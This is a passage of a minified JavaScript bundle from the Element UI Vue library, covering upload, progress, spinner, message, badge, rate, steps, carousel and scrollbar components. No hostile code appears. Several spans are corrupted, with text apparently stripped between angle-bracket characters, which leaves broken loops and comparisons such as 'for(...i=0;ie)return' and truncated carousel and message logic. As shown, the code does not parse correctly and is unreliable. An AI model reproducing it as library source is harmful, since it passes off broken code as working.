e})).some((function(e){return/\..+$/.test(e)?s===e:/\/\*$/.test(e)?r===e.replace(/\/\*$/,""):!!/^[^\/]+\/[^\/]+$/.test(e)&&i===e}))}))):this.$emit("file",e.dataTransfer.files)}}}},oh=ah,lh=o(oh,sh,rh,!1,null,null,null);lh.options.__file="packages/upload/src/upload-dragger.vue";var ch,uh,hh=lh.exports,dh={inject:["uploader"],components:{UploadDragger:hh},props:{type:String,action:{type:String,required:!0},name:{type:String,default:"file"},data:Object,headers:Object,withCredentials:Boolean,multiple:Boolean,accept:String,onStart:Function,onProgress:Function,onSuccess:Function,onError:Function,beforeUpload:Function,drag:Boolean,onPreview:{type:Function,default:function(){}},onRemove:{type:Function,default:function(){}},fileList:Array,autoUpload:Boolean,listType:String,httpRequest:{type:Function,default:nh},disabled:Boolean,limit:Number,onExceed:Function},data:function(){return{mouseover:!1,reqs:{}}},methods:{isImage:function(e){return-1!==e.indexOf("image")},handleChange:function(e){var t=e.target.files;t&&this.uploadFiles(t)},uploadFiles:function(e){var t=this;if(this.limit&&this.fileList.length+e.length>this.limit)this.onExceed&&this.onExceed(e,this.fileList);else{var i=Array.prototype.slice.call(e);this.multiple||(i=i.slice(0,1)),0!==i.length&&i.forEach((function(e){t.onStart(e),t.autoUpload&&t.upload(e)}))}},upload:function(e){var t=this;if(this.$refs.input.value=null,!this.beforeUpload)return this.post(e);var i=this.beforeUpload(e);i&&i.then?i.then((function(i){var n=Object.prototype.toString.call(i);if("[object File]"===n||"[object Blob]"===n){for(var s in"[object Blob]"===n&&(i=new File([i],e.name,{type:e.type})),e)e.hasOwnProperty(s)&&(i[s]=e[s]);t.post(i)}else t.post(e)}),(function(){t.onRemove(null,e)})):!1!==i?this.post(e):this.onRemove(null,e)},abort:function(e){var t=this.reqs;if(e){var i=e;e.uid&&(i=e.uid),t[i]&&t[i].abort()}else Object.keys(t).forEach((function(e){t[e]&&t[e].abort(),delete t[e]}))},post:function(e){var t=this,i=e.uid,n={headers:this.headers,withCredentials:this.withCredentials,file:e,data:this.data,filename:this.name,action:this.action,onProgress:function(i){t.onProgress(i,e)},onSuccess:function(n){t.onSuccess(n,e),delete t.reqs[i]},onError:function(n){t.onError(n,e),delete t.reqs[i]}},s=this.httpRequest(n);this.reqs[i]=s,s&&s.then&&s.then(n.onSuccess,n.onError)},handleClick:function(){this.disabled||(this.$refs.input.value=null,this.$refs.input.click())},handleKeydown:function(e){e.target===e.currentTarget&&(13!==e.keyCode&&32!==e.keyCode||this.handleClick())}},render:function(e){var t=this.handleClick,i=this.drag,n=this.name,s=this.handleChange,r=this.multiple,a=this.accept,o=this.listType,l=this.uploadFiles,c=this.disabled,u=this.handleKeydown,h={class:{"el-upload":!0},on:{click:t,keydown:u}};return h.class["el-upload--"+o]=!0,e("div",eh()([h,{attrs:{tabindex:"0"}}]),[i?e("upload-dragger",{attrs:{disabled:c},on:{file:l}},[this.$slots.default]):this.$slots.default,e("input",{class:"el-upload__input",attrs:{type:"file",name:n,multiple:r,accept:a},ref:"input",on:{change:s}})])}},ph=dh,fh=o(ph,ch,uh,!1,null,null,null);fh.options.__file="packages/upload/src/upload.vue";var mh=fh.exports;function vh(){}var gh,bh,yh={name:"ElUpload",mixins:[D.a],components:{ElProgress:Uu.a,UploadList:Qu,Upload:mh},provide:function(){return{uploader:this}},inject:{elForm:{default:""}},props:{action:{type:String,required:!0},headers:{type:Object,default:function(){return{}}},data:Object,multiple:Boolean,name:{type:String,default:"file"},drag:Boolean,dragger:Boolean,withCredentials:Boolean,showFileList:{type:Boolean,default:!0},accept:String,type:{type:String,default:"select"},beforeUpload:Function,beforeRemove:Function,onRemove:{type:Function,default:vh},onChange:{type:Function,default:vh},onPreview:{type:Function},onSuccess:{type:Function,default:vh},onProgress:{type:Function,default:vh},onError:{type:Function,default:vh},fileList:{type:Array,default:function(){return[]}},autoUpload:{type:Boolean,default:!0},listType:{type:String,default:"text"},httpRequest:Function,disabled:Boolean,limit:Number,onExceed:{type:Function,default:vh}},data:function(){return{uploadFiles:[],dragOver:!1,draging:!1,tempIndex:1}},computed:{uploadDisabled:function(){return this.disabled||(this.elForm||{}).disabled}},watch:{listType:function(e){"picture-card"!==e&&"picture"!==e||(this.uploadFiles=this.uploadFiles.map((function(e){if(!e.url&&e.raw)try{e.url=URL.createObjectURL(e.raw)}catch(t){console.error("[Element Error][Upload]",t)}return e})))},fileList:{immediate:!0,handler:function(e){var t=this;this.uploadFiles=e.map((function(e){return e.uid=e.uid||Date.now()+t.tempIndex++,e.status=e.status||"success",e}))}}},methods:{handleStart:function(e){e.uid=Date.now()+this.tempIndex++;var t={status:"ready",name:e.name,size:e.size,percentage:0,uid:e.uid,raw:e};if("picture-card"===this.listType||"picture"===this.listType)try{t.url=URL.createObjectURL(e)}catch(i){return void console.error("[Element Error][Upload]",i)}this.uploadFiles.push(t),this.onChange(t,this.uploadFiles)},handleProgress:function(e,t){var i=this.getFile(t);this.onProgress(e,i,this.uploadFiles),i.status="uploading",i.percentage=e.percent||0},handleSuccess:function(e,t){var i=this.getFile(t);i&&(i.status="success",i.response=e,this.onSuccess(e,i,this.uploadFiles),this.onChange(i,this.uploadFiles))},handleError:function(e,t){var i=this.getFile(t),n=this.uploadFiles;i.status="fail",n.splice(n.indexOf(i),1),this.onError(e,i,this.uploadFiles),this.onChange(i,this.uploadFiles)},handleRemove:function(e,t){var i=this;t&&(e=this.getFile(t));var n=function(){i.abort(e);var t=i.uploadFiles;t.splice(t.indexOf(e),1),i.onRemove(e,t)};if(this.beforeRemove){if("function"===typeof this.beforeRemove){var s=this.beforeRemove(e,this.uploadFiles);s&&s.then?s.then((function(){n()}),vh):!1!==s&&n()}}else n()},getFile:function(e){var t=this.uploadFiles,i=void 0;return t.every((function(t){return i=e.uid===t.uid?t:null,!i})),i},abort:function(e){this.$refs["upload-inner"].abort(e)},clearFiles:function(){this.uploadFiles=[]},submit:function(){var e=this;this.uploadFiles.filter((function(e){return"ready"===e.status})).forEach((function(t){e.$refs["upload-inner"].upload(t.raw)}))},getMigratingConfig:function(){return{props:{"default-file-list":"default-file-list is renamed to file-list.","show-upload-list":"show-upload-list is renamed to show-file-list.","thumbnail-mode":"thumbnail-mode has been deprecated, you can implement the same effect according to this case: http://element.eleme.io/#/zh-CN/component/upload#yong-hu-tou-xiang-shang-chuan"}}}},beforeDestroy:function(){this.uploadFiles.forEach((function(e){e.url&&0===e.url.indexOf("blob:")&&URL.revokeObjectURL(e.url)}))},render:function(e){var t=this,i=void 0;this.showFileList&&(i=e(Qu,{attrs:{disabled:this.uploadDisabled,listType:this.listType,files:this.uploadFiles,handlePreview:this.onPreview},on:{remove:this.handleRemove}},[function(e){if(t.$scopedSlots.file)return t.$scopedSlots.file({file:e.file})}]));var n={props:{type:this.type,drag:this.drag,action:this.action,multiple:this.multiple,"before-upload":this.beforeUpload,"with-credentials":this.withCredentials,headers:this.headers,name:this.name,data:this.data,accept:this.accept,fileList:this.uploadFiles,autoUpload:this.autoUpload,listType:this.listType,disabled:this.uploadDisabled,limit:this.limit,"on-exceed":this.onExceed,"on-start":this.handleStart,"on-progress":this.handleProgress,"on-success":this.handleSuccess,"on-error":this.handleError,"on-preview":this.onPreview,"on-remove":this.handleRemove,"http-request":this.httpRequest},ref:"upload-inner"},s=this.$slots.trigger||this.$slots.default,r=e("upload",n,[s]);return e("div",["picture-card"===this.listType?i:"",this.$slots.trigger?[r,this.$slots.default]:r,this.$slots.tip,"picture-card"!==this.listType?i:""])}},_h=yh,xh=o(_h,gh,bh,!1,null,null,null);xh.options.__file="packages/upload/src/index.vue";var Ch=xh.exports;Ch.install=function(e){e.component(Ch.name,Ch)};var wh=Ch,kh=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-progress",class:["el-progress--"+e.type,e.status?"is-"+e.status:"",{"el-progress--without-text":!e.showText,"el-progress--text-inside":e.textInside}],attrs:{role:"progressbar","aria-valuenow":e.percentage,"aria-valuemin":"0","aria-valuemax":"100"}},["line"===e.type?i("div",{staticClass:"el-progress-bar"},[i("div",{staticClass:"el-progress-bar__outer",style:{height:e.strokeWidth+"px"}},[i("div",{staticClass:"el-progress-bar__inner",style:e.barStyle},[e.showText&&e.textInside?i("div",{staticClass:"el-progress-bar__innerText"},[e._v(e._s(e.content))]):e._e()])])]):i("div",{staticClass:"el-progress-circle",style:{height:e.width+"px",width:e.width+"px"}},[i("svg",{attrs:{viewBox:"0 0 100 100"}},[i("path",{staticClass:"el-progress-circle__track",style:e.trailPathStyle,attrs:{d:e.trackPath,stroke:"#e5e9f2","stroke-width":e.relativeStrokeWidth,fill:"none"}}),i("path",{staticClass:"el-progress-circle__path",style:e.circlePathStyle,attrs:{d:e.trackPath,stroke:e.stroke,fill:"none","stroke-linecap":e.strokeLinecap,"stroke-width":e.percentage?e.relativeStrokeWidth:0}})])]),e.showText&&!e.textInside?i("div",{staticClass:"el-progress__text",style:{fontSize:e.progressTextSize+"px"}},[e.status?i("i",{class:e.iconClass}):[e._v(e._s(e.content))]],2):e._e()])},Sh=[];kh._withStripped=!0;var Dh={name:"ElProgress",props:{type:{type:String,default:"line",validator:function(e){return["line","circle","dashboard"].indexOf(e)>-1}},percentage:{type:Number,default:0,required:!0,validator:function(e){return e>=0&&e<=100}},status:{type:String,validator:function(e){return["success","exception","warning"].indexOf(e)>-1}},strokeWidth:{type:Number,default:6},strokeLinecap:{type:String,default:"round"},textInside:{type:Boolean,default:!1},width:{type:Number,default:126},showText:{type:Boolean,default:!0},color:{type:[String,Array,Function],default:""},format:Function},computed:{barStyle:function(){var e={};return e.width=this.percentage+"%",e.backgroundColor=this.getCurrentColor(this.percentage),e},relativeStrokeWidth:function(){return(this.strokeWidth/this.width*100).toFixed(1)},radius:function(){return"circle"===this.type||"dashboard"===this.type?parseInt(50-parseFloat(this.relativeStrokeWidth)/2,10):0},trackPath:function(){var e=this.radius,t="dashboard"===this.type;return"\n M 50 50\n m 0 "+(t?"":"-")+e+"\n a "+e+" "+e+" 0 1 1 0 "+(t?"-":"")+2*e+"\n a "+e+" "+e+" 0 1 1 0 "+(t?"":"-")+2*e+"\n "},perimeter:function(){return 2*Math.PI*this.radius},rate:function(){return"dashboard"===this.type?.75:1},strokeDashoffset:function(){var e=-1*this.perimeter*(1-this.rate)/2;return e+"px"},trailPathStyle:function(){return{strokeDasharray:this.perimeter*this.rate+"px, "+this.perimeter+"px",strokeDashoffset:this.strokeDashoffset}},circlePathStyle:function(){return{strokeDasharray:this.perimeter*this.rate*(this.percentage/100)+"px, "+this.perimeter+"px",strokeDashoffset:this.strokeDashoffset,transition:"stroke-dasharray 0.6s ease 0s, stroke 0.6s ease"}},stroke:function(){var e=void 0;if(this.color)e=this.getCurrentColor(this.percentage);else switch(this.status){case"success":e="#13ce66";break;case"exception":e="#ff4949";break;case"warning":e="#e6a23c";break;default:e="#20a0ff"}return e},iconClass:function(){return"warning"===this.status?"el-icon-warning":"line"===this.type?"success"===this.status?"el-icon-circle-check":"el-icon-circle-close":"success"===this.status?"el-icon-check":"el-icon-close"},progressTextSize:function(){return"line"===this.type?12+.4*this.strokeWidth:.111111*this.width+2},content:function(){return"function"===typeof this.format?this.format(this.percentage)||"":this.percentage+"%"}},methods:{getCurrentColor:function(e){return"function"===typeof this.color?this.color(e):"string"===typeof this.color?this.color:this.getLevelColor(e)},getLevelColor:function(e){for(var t=this.getColorArray().sort((function(e,t){return e.percentage-t.percentage})),i=0;ie)return t[i].color;return t[t.length-1].color},getColorArray:function(){var e=this.color,t=100/e.length;return e.map((function(e,i){return"string"===typeof e?{color:e,percentage:(i+1)*t}:e}))}}},$h=Dh,Oh=o($h,kh,Sh,!1,null,null,null);Oh.options.__file="packages/progress/src/progress.vue";var Eh=Oh.exports;Eh.install=function(e){e.component(Eh.name,Eh)};var Th=Eh,Ph=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("span",{staticClass:"el-spinner"},[i("svg",{staticClass:"el-spinner-inner",style:{width:e.radius/2+"px",height:e.radius/2+"px"},attrs:{viewBox:"0 0 50 50"}},[i("circle",{staticClass:"path",attrs:{cx:"25",cy:"25",r:"20",fill:"none",stroke:e.strokeColor,"stroke-width":e.strokeWidth}})])])},Mh=[];Ph._withStripped=!0;var Nh={name:"ElSpinner",props:{type:String,radius:{type:Number,default:100},strokeWidth:{type:Number,default:5},strokeColor:{type:String,default:"#efefef"}}},Ih=Nh,jh=o(Ih,Ph,Mh,!1,null,null,null);jh.options.__file="packages/spinner/src/spinner.vue";var Fh=jh.exports;Fh.install=function(e){e.component(Fh.name,Fh)};var Lh=Fh,Ah=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-message-fade"},on:{"after-leave":e.handleAfterLeave}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],class:["el-message",e.type&&!e.iconClass?"el-message--"+e.type:"",e.center?"is-center":"",e.showClose?"is-closable":"",e.customClass],style:e.positionStyle,attrs:{role:"alert"},on:{mouseenter:e.clearTimer,mouseleave:e.startTimer}},[e.iconClass?i("i",{class:e.iconClass}):i("i",{class:e.typeClass}),e._t("default",[e.dangerouslyUseHTMLString?i("p",{staticClass:"el-message__content",domProps:{innerHTML:e._s(e.message)}}):i("p",{staticClass:"el-message__content"},[e._v(e._s(e.message))])]),e.showClose?i("i",{staticClass:"el-message__closeBtn el-icon-close",on:{click:e.close}}):e._e()],2)])},Vh=[];Ah._withStripped=!0;var Bh={success:"success",info:"info",warning:"warning",error:"error"},zh={data:function(){return{visible:!1,message:"",duration:3e3,type:"info",iconClass:"",customClass:"",onClose:null,showClose:!1,closed:!1,verticalOffset:20,timer:null,dangerouslyUseHTMLString:!1,center:!1}},computed:{typeClass:function(){return this.type&&!this.iconClass?"el-message__icon el-icon-"+Bh[this.type]:""},positionStyle:function(){return{top:this.verticalOffset+"px"}}},watch:{closed:function(e){e&&(this.visible=!1)}},methods:{handleAfterLeave:function(){this.$destroy(!0),this.$el.parentNode.removeChild(this.$el)},close:function(){this.closed=!0,"function"===typeof this.onClose&&this.onClose(this)},clearTimer:function(){clearTimeout(this.timer)},startTimer:function(){var e=this;this.duration>0&&(this.timer=setTimeout((function(){e.closed||e.close()}),this.duration))},keydown:function(e){27===e.keyCode&&(this.closed||this.close())}},mounted:function(){this.startTimer(),document.addEventListener("keydown",this.keydown)},beforeDestroy:function(){document.removeEventListener("keydown",this.keydown)}},Rh=zh,Hh=o(Rh,Ah,Vh,!1,null,null,null);Hh.options.__file="packages/message/src/main.vue";var Wh=Hh.exports,qh=i(15),Yh=Object.assign||function(e){for(var t=1;tGh.length-1))for(var a=n;a=0;e--)Gh[e].close()};var Qh=Zh,Jh=Qh,ed=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-badge"},[e._t("default"),i("transition",{attrs:{name:"el-zoom-in-center"}},[i("sup",{directives:[{name:"show",rawName:"v-show",value:!e.hidden&&(e.content||0===e.content||e.isDot),expression:"!hidden && (content || content === 0 || isDot)"}],staticClass:"el-badge__content",class:[e.type?"el-badge__content--"+e.type:null,{"is-fixed":e.$slots.default,"is-dot":e.isDot}],domProps:{textContent:e._s(e.content)}})])],2)},td=[];ed._withStripped=!0;var id={name:"ElBadge",props:{value:[String,Number],max:Number,isDot:Boolean,hidden:Boolean,type:{type:String,validator:function(e){return["primary","success","warning","info","danger"].indexOf(e)>-1}}},computed:{content:function(){if(!this.isDot){var e=this.value,t=this.max;return"number"===typeof e&&"number"===typeof t&&t0&&e-1this.value,i=this.allowHalf&&this.pointerAtLeftHalf&&e-.5<=this.currentValue&&e>this.currentValue;return t||i},getIconStyle:function(e){var t=this.rateDisabled?this.disabledVoidColor:this.voidColor;return{color:e<=this.currentValue?this.activeColor:t}},selectValue:function(e){this.rateDisabled||(this.allowHalf&&this.pointerAtLeftHalf?(this.$emit("input",this.currentValue),this.$emit("change",this.currentValue)):(this.$emit("input",e),this.$emit("change",e)))},handleKey:function(e){if(!this.rateDisabled){var t=this.currentValue,i=e.keyCode;38===i||39===i?(this.allowHalf?t+=.5:t+=1,e.stopPropagation(),e.preventDefault()):37!==i&&40!==i||(this.allowHalf?t-=.5:t-=1,e.stopPropagation(),e.preventDefault()),t=t<0?0:t,t=t>this.max?this.max:t,this.$emit("input",t),this.$emit("change",t)}},setCurrentValue:function(e,t){if(!this.rateDisabled){if(this.allowHalf){var i=t.target;Object(Ae["hasClass"])(i,"el-rate__item")&&(i=i.querySelector(".el-rate__icon")),Object(Ae["hasClass"])(i,"el-rate__decimal")&&(i=i.parentNode),this.pointerAtLeftHalf=2*t.offsetX<=i.clientWidth,this.currentValue=this.pointerAtLeftHalf?e-.5:e}else this.currentValue=e;this.hoverIndex=e}},resetCurrentValue:function(){this.rateDisabled||(this.allowHalf&&(this.pointerAtLeftHalf=this.value!==Math.floor(this.value)),this.currentValue=this.value,this.hoverIndex=-1)}},created:function(){this.value||this.$emit("input",0)}},gd=vd,bd=o(gd,fd,md,!1,null,null,null);bd.options.__file="packages/rate/src/main.vue";var yd=bd.exports;yd.install=function(e){e.component(yd.name,yd)};var _d=yd,xd=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-steps",class:[!e.simple&&"el-steps--"+e.direction,e.simple&&"el-steps--simple"]},[e._t("default")],2)},Cd=[];xd._withStripped=!0;var wd={name:"ElSteps",mixins:[D.a],props:{space:[Number,String],active:Number,direction:{type:String,default:"horizontal"},alignCenter:Boolean,simple:Boolean,finishStatus:{type:String,default:"finish"},processStatus:{type:String,default:"process"}},data:function(){return{steps:[],stepOffset:0}},methods:{getMigratingConfig:function(){return{props:{center:"center is removed."}}}},watch:{active:function(e,t){this.$emit("change",e,t)},steps:function(e){e.forEach((function(e,t){e.index=t}))}}},kd=wd,Sd=o(kd,xd,Cd,!1,null,null,null);Sd.options.__file="packages/steps/src/steps.vue";var Dd=Sd.exports;Dd.install=function(e){e.component(Dd.name,Dd)};var $d=Dd,Od=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-step",class:[!e.isSimple&&"is-"+e.$parent.direction,e.isSimple&&"is-simple",e.isLast&&!e.space&&!e.isCenter&&"is-flex",e.isCenter&&!e.isVertical&&!e.isSimple&&"is-center"],style:e.style},[i("div",{staticClass:"el-step__head",class:"is-"+e.currentStatus},[i("div",{staticClass:"el-step__line",style:e.isLast?"":{marginRight:e.$parent.stepOffset+"px"}},[i("i",{staticClass:"el-step__line-inner",style:e.lineStyle})]),i("div",{staticClass:"el-step__icon",class:"is-"+(e.icon?"icon":"text")},["success"!==e.currentStatus&&"error"!==e.currentStatus?e._t("icon",[e.icon?i("i",{staticClass:"el-step__icon-inner",class:[e.icon]}):e._e(),e.icon||e.isSimple?e._e():i("div",{staticClass:"el-step__icon-inner"},[e._v(e._s(e.index+1))])]):i("i",{staticClass:"el-step__icon-inner is-status",class:["el-icon-"+("success"===e.currentStatus?"check":"close")]})],2)]),i("div",{staticClass:"el-step__main"},[i("div",{ref:"title",staticClass:"el-step__title",class:["is-"+e.currentStatus]},[e._t("title",[e._v(e._s(e.title))])],2),e.isSimple?i("div",{staticClass:"el-step__arrow"}):i("div",{staticClass:"el-step__description",class:["is-"+e.currentStatus]},[e._t("description",[e._v(e._s(e.description))])],2)])])},Ed=[];Od._withStripped=!0;var Td={name:"ElStep",props:{title:String,icon:String,description:String,status:String},data:function(){return{index:-1,lineStyle:{},internalStatus:""}},beforeCreate:function(){this.$parent.steps.push(this)},beforeDestroy:function(){var e=this.$parent.steps,t=e.indexOf(this);t>=0&&e.splice(t,1)},computed:{currentStatus:function(){return this.status||this.internalStatus},prevStatus:function(){var e=this.$parent.steps[this.index-1];return e?e.currentStatus:"wait"},isCenter:function(){return this.$parent.alignCenter},isVertical:function(){return"vertical"===this.$parent.direction},isSimple:function(){return this.$parent.simple},isLast:function(){var e=this.$parent;return e.steps[e.steps.length-1]===this},stepsCount:function(){return this.$parent.steps.length},space:function(){var e=this.isSimple,t=this.$parent.space;return e?"":t},style:function(){var e={},t=this.$parent,i=t.steps.length,n="number"===typeof this.space?this.space+"px":this.space?this.space:100/(i-(this.isCenter?0:1))+"%";return e.flexBasis=n,this.isVertical||(this.isLast?e.maxWidth=100/this.stepsCount+"%":e.marginRight=-this.$parent.stepOffset+"px"),e}},methods:{updateStatus:function(e){var t=this.$parent.$children[this.index-1];e>this.index?this.internalStatus=this.$parent.finishStatus:e===this.index&&"error"!==this.prevStatus?this.internalStatus=this.$parent.processStatus:this.internalStatus="wait",t&&t.calcProgress(this.internalStatus)},calcProgress:function(e){var t=100,i={};i.transitionDelay=150*this.index+"ms",e===this.$parent.processStatus?(this.currentStatus,t=0):"wait"===e&&(t=0,i.transitionDelay=-150*this.index+"ms"),i.borderWidth=t&&!this.isSimple?"1px":0,"vertical"===this.$parent.direction?i.height=t+"%":i.width=t+"%",this.lineStyle=i}},mounted:function(){var e=this,t=this.$watch("index",(function(i){e.$watch("$parent.active",e.updateStatus,{immediate:!0}),e.$watch("$parent.processStatus",(function(){var t=e.$parent.active;e.updateStatus(t)}),{immediate:!0}),t()}))}},Pd=Td,Md=o(Pd,Od,Ed,!1,null,null,null);Md.options.__file="packages/steps/src/step.vue";var Nd=Md.exports;Nd.install=function(e){e.component(Nd.name,Nd)};var Id=Nd,jd=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{class:e.carouselClasses,on:{mouseenter:function(t){return t.stopPropagation(),e.handleMouseEnter(t)},mouseleave:function(t){return t.stopPropagation(),e.handleMouseLeave(t)}}},[i("div",{staticClass:"el-carousel__container",style:{height:e.height}},[e.arrowDisplay?i("transition",{attrs:{name:"carousel-arrow-left"}},[i("button",{directives:[{name:"show",rawName:"v-show",value:("always"===e.arrow||e.hover)&&(e.loop||e.activeIndex>0),expression:"(arrow === 'always' || hover) && (loop || activeIndex > 0)"}],staticClass:"el-carousel__arrow el-carousel__arrow--left",attrs:{type:"button"},on:{mouseenter:function(t){e.handleButtonEnter("left")},mouseleave:e.handleButtonLeave,click:function(t){t.stopPropagation(),e.throttledArrowClick(e.activeIndex-1)}}},[i("i",{staticClass:"el-icon-arrow-left"})])]):e._e(),e.arrowDisplay?i("transition",{attrs:{name:"carousel-arrow-right"}},[i("button",{directives:[{name:"show",rawName:"v-show",value:("always"===e.arrow||e.hover)&&(e.loop||e.activeIndex0}))},carouselClasses:function(){var e=["el-carousel","el-carousel--"+this.direction];return"card"===this.type&&e.push("el-carousel--card"),e},indicatorsClasses:function(){var e=["el-carousel__indicators","el-carousel__indicators--"+this.direction];return this.hasLabel&&e.push("el-carousel__indicators--labels"),"outside"!==this.indicatorPosition&&"card"!==this.type||e.push("el-carousel__indicators--outside"),e}},watch:{items:function(e){e.length>0&&this.setActiveItem(this.initialIndex)},activeIndex:function(e,t){this.resetItemPosition(t),t>-1&&this.$emit("change",e,t)},autoplay:function(e){e?this.startTimer():this.pauseTimer()},loop:function(){this.setActiveItem(this.activeIndex)},interval:function(){this.pauseTimer(),this.startTimer()}},methods:{handleMouseEnter:function(){this.hover=!0,this.pauseTimer()},handleMouseLeave:function(){this.hover=!1,this.startTimer()},itemInStage:function(e,t){var i=this.items.length;return t===i-1&&e.inStage&&this.items[0].active||e.inStage&&this.items[t+1]&&this.items[t+1].active?"left":!!(0===t&&e.inStage&&this.items[i-1].active||e.inStage&&this.items[t-1]&&this.items[t-1].active)&&"right"},handleButtonEnter:function(e){var t=this;"vertical"!==this.direction&&this.items.forEach((function(i,n){e===t.itemInStage(i,n)&&(i.hover=!0)}))},handleButtonLeave:function(){"vertical"!==this.direction&&this.items.forEach((function(e){e.hover=!1}))},updateItems:function(){this.items=this.$children.filter((function(e){return"ElCarouselItem"===e.$options.name}))},resetItemPosition:function(e){var t=this;this.items.forEach((function(i,n){i.translateItem(n,t.activeIndex,e)}))},playSlides:function(){this.activeIndex0&&(e=this.items.indexOf(t[0]))}if(e=Number(e),isNaN(e)||e!==Math.floor(e))console.warn("[Element Warn][Carousel]index must be an integer.");else{var i=this.items.length,n=this.activeIndex;this.activeIndex=e<0?this.loop?i-1:0:e>=i?this.loop?0:i-1:e,n===this.activeIndex&&this.resetItemPosition(n),this.resetTimer()}},prev:function(){this.setActiveItem(this.activeIndex-1)},next:function(){this.setActiveItem(this.activeIndex+1)},handleIndicatorClick:function(e){this.activeIndex=e},handleIndicatorHover:function(e){"hover"===this.trigger&&e!==this.activeIndex&&(this.activeIndex=e)}},created:function(){var e=this;this.throttledArrowClick=Ad()(300,!0,(function(t){e.setActiveItem(t)})),this.throttledIndicatorHover=Ad()(300,(function(t){e.handleIndicatorHover(t)}))},mounted:function(){var e=this;this.updateItems(),this.$nextTick((function(){Object(Ji["addResizeListener"])(e.$el,e.resetItemPosition),e.initialIndex=0&&(e.activeIndex=e.initialIndex),e.startTimer()}))},beforeDestroy:function(){this.$el&&Object(Ji["removeResizeListener"])(this.$el,this.resetItemPosition),this.pauseTimer()}},Bd=Vd,zd=o(Bd,jd,Fd,!1,null,null,null);zd.options.__file="packages/carousel/src/main.vue";var Rd=zd.exports;Rd.install=function(e){e.component(Rd.name,Rd)};var Hd=Rd,Wd={vertical:{offset:"offsetHeight",scroll:"scrollTop",scrollSize:"scrollHeight",size:"height",key:"vertical",axis:"Y",client:"clientY",direction:"top"},horizontal:{offset:"offsetWidth",scroll:"scrollLeft",scrollSize:"scrollWidth",size:"width",key:"horizontal",axis:"X",client:"clientX",direction:"left"}};function qd(e){var t=e.move,i=e.size,n=e.bar,s={},r="translate"+n.axis+"("+t+"%)";return s[n.size]=i,s.transform=r,s.msTransform=r,s.webkitTransform=r,s}var Yd={name:"Bar",props:{vertical:Boolean,size:String,move:Number},computed:{bar:function(){return Wd[this.vertical?"vertical":"horizontal"]},wrap:function(){return this.$parent.wrap}},render:function(e){var t=this.size,i=this.move,n=this.bar;return e("div",{class:["el-scrollbar__bar","is-"+n.key],on:{mousedown:this.clickTrackHandler}},[e("div",{ref:"thumb",class:"el-scrollbar__thumb",on:{mousedown:this.clickThumbHandler},style:qd({size:t,move:i,bar:n})})])},methods:{clickThumbHandler:function(e){e.ctrlKey||2===e.button||(this.startDrag(e),this[this.bar.axis]=e.currentTarget[this.bar.offset]-(e[this.bar.client]-e.currentTarget.getBoundingClientRect()[this.bar.direction]))},clickTrackHandler:function(e){var t=Math.abs(e.target.getBoundingClientRect()[this.bar.direction]-e[this.bar.client]),i=this.$refs.thumb[this.bar.offset]/2,n=100*(t-i)/this.$el[this.bar.offset];this.wrap[this.bar.scroll]=n*this.wrap[this.bar.scrollSize]/100},startDrag:function(e){e.stopImmediatePropagation(),this.cursorDown=!0,Object(Ae["on"])(document,"mousemove",this.mouseMoveDocumentHandler),Object(Ae["on"])(document,"mouseup",this.mouseUpDocumentHandler),document.onselectstart=function(){return!1}},mouseMoveDocumentHandler:function(e){if(!1!==this.cursorDown){var t=this[this.bar.axis];if(t){var i=-1*(this.$el.getBoundingClientRect()[this.bar.direction]-e[this.bar.client]),n=this.$refs.thumb[this.bar.offset]-t,s=100*(i-n)/this.$el[this.bar.offset];this.wrap[this.bar.scroll]=s*this.wrap[this.bar.scrollSize]/100}}},mouseUpDocumentHandler:function(e){this.cursorDown=!1,this[this.bar.axis]=0,Object(Ae["off"])(document,"mousemove",this.mouseMoveDocumentHandler),document.onselectstart=null}},destroyed:function(){Object(Ae["off"])(document,"mouseup",this.mouseUpDocumentHandler)}},Kd={name:"ElScrollbar",components:{Bar:Yd},props:{native:Boolean,wrapStyle:{},wrapClass:{},viewClass:{},viewStyle:{},noresize:Boolean,tag:{type:String,default:"div"}},data:function(){return{sizeWidth:"0",sizeHeight:"0",moveX:0,moveY:0}},computed:{wrap:function(){return this.$refs.wrap}},render:function(e){var t=gs()(),i=this.wrapStyle;if(t){var n="-"+t+"px",s="margin-bottom: "+n+"; margin-right: "+n+";";Array.isArray(this.wrapStyle)?(i=Object(b["toObject"])(this.wrapStyle),i.marginRight=i.marginBottom=n):"string"===typeof this.wrapStyle?i+=s:i=s}var r=e(this.tag,{class:["el-scrollbar__view",this.viewClass],style:this.viewStyle,ref:"resize"},this.$slots.default),a=e("div",{ref:"wrap",style:i,on:{scroll:this.handleScroll},class:[this.wrapClass,"el-scrollbar__wrap",t?"":"el-scrollbar__wrap--hidden-default"]},[[r]]),o=void 0;return o=this.native?[e("div",{ref:"wrap",class:[this.wrapClass,"el-scrollbar__wrap"],style:i},[[r]])]:[a,e(Yd,{attrs:{move:this.moveX,size:this.sizeWidth}}),e(Yd,{attrs:{vertical:!0,move:this.moveY,size:this.sizeHeight}})],e("div",{class:"el-scrollbar"},o)},methods:{handleScroll:function(){var e=this.wrap;this.moveY=100*e.scrollTop/e.clientHeight,this.moveX=100*e.scrollLeft/e.clientWidth},update:function(){var e=void 0,t=void 0,i=this.wrap;i&&(e=100*i.clientHeight/i.scrollHeight,t=100*i.clientWidth/i.scrollWidth,this.sizeHeight=e<100?e+"%":"",this.sizeWidth=t<100?t+"%":"")}},mounted:function(){this.native||(this.$nextTick(this.update),!this.noresize&&Object(Ji["addResizeListener"])(this.$refs.resize,this.update))},beforeDestroy:function(){this.native||!this.noresize&&Object(Ji["removeResizeListener"])(this.$refs.resize,this.update)},install:function(e){e.component(Kd.name,Kd)}},Ud=Kd,Gd=function(){var e=this,t=e.$createElement,i=e._self._c||t;return 